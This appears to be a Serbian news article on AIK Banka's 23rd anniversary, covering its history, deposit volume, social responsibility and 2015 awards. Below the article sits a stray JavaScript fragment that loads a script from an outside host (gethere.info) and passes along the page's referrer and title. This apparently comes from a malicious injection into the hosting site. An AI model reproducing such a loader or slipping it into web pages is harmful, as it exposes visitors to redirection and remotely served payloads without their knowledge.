AIK banka proslavila 23 godine poslovanja

AIK banka proslavila 23 godine poslovanja


Sa više od 620 miliona evra devizne štednje stanovništva, AIK Banka je prepoznata kao pouzdan partner velikom broju građana i privrednika

AIK Banka obeležila je 23 godine uspešnog poslovanja i poverenja klijenata. Put od interne banke Agroindustrijskog kombinata Niš, do jednog od lidera srpskog bankarskog tržišta nije bio lak, ali zahvaljujući likvidnosti, solventnosti i rentabilnosti, kao i kapacitetu sopstvenog kapitala, Banka je brzo dospela na ovu poziciju.

Prateći tokove savremenog bankarstva, AIK Banka je svoju tradicionalno privredno orijentisanu strategiju prilagođavala tržištu i klijentima, čije je potrebe godinama pažljivo osluškivala i radila na zadobijanju njihovog poverenja. Obim usluga širio se iz godine u godinu, a poslovni fokus pomerao ka proizvodima namenjenim stanovništvu i poljoprivredi, kao i sektoru malih i srednjih preduzeća. Danas, sa više od 620 miliona evra devizne štednje stanovništva, AIK Banka je prepoznata kao pouzdan partner velikom broju građana i privrednika. Pored toga što zauzima jednu od vodećih pozicija po broju klijenata, AIK Banka je lider i po adekvatnosti kapitala bankarskog sistema Srbije.

Pored toga, AIK Banka je i društveno odgovorna institucija koja vodi računa o unapređenju zajednice. Ona predstavlja snažan oslonac razvoju lokalne zajednice i doprinosi boljem kvalitetu života koji se ogleda u kontinuiranim ulaganjima i inovacijama, pokazivanju ekološke svesti i brige o zaštiti životne sredine, vođenju računa o širim društvenim pitanjima.

Prestižni britanski ekonomski magazin INTERNATIONAL BANKER je 2015. godine, pod pokroviteljstvom FINANCIAL TIMES u okviru svojih nagrada BANKING AWARDS dodelio AIK Banci dva priznanja: za najbolju komercijalnu banku u Srbiji i najinovativniju banku u sektoru rada sa stanovništvom. Pored toga, Evropsko poslovno veće, renomirana nezavisna korporacija ekonomske, socijalne i humanitarne saradnje, u okviru svojih nagrada International Socrates Award Ceremony, dodelila je AIK Banci priznanje za najbolje regionalno preduzeće, dok je Jelena Galić, predsednica Izvršnog odbora AIK Banke, proglašena menadžerom godine.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar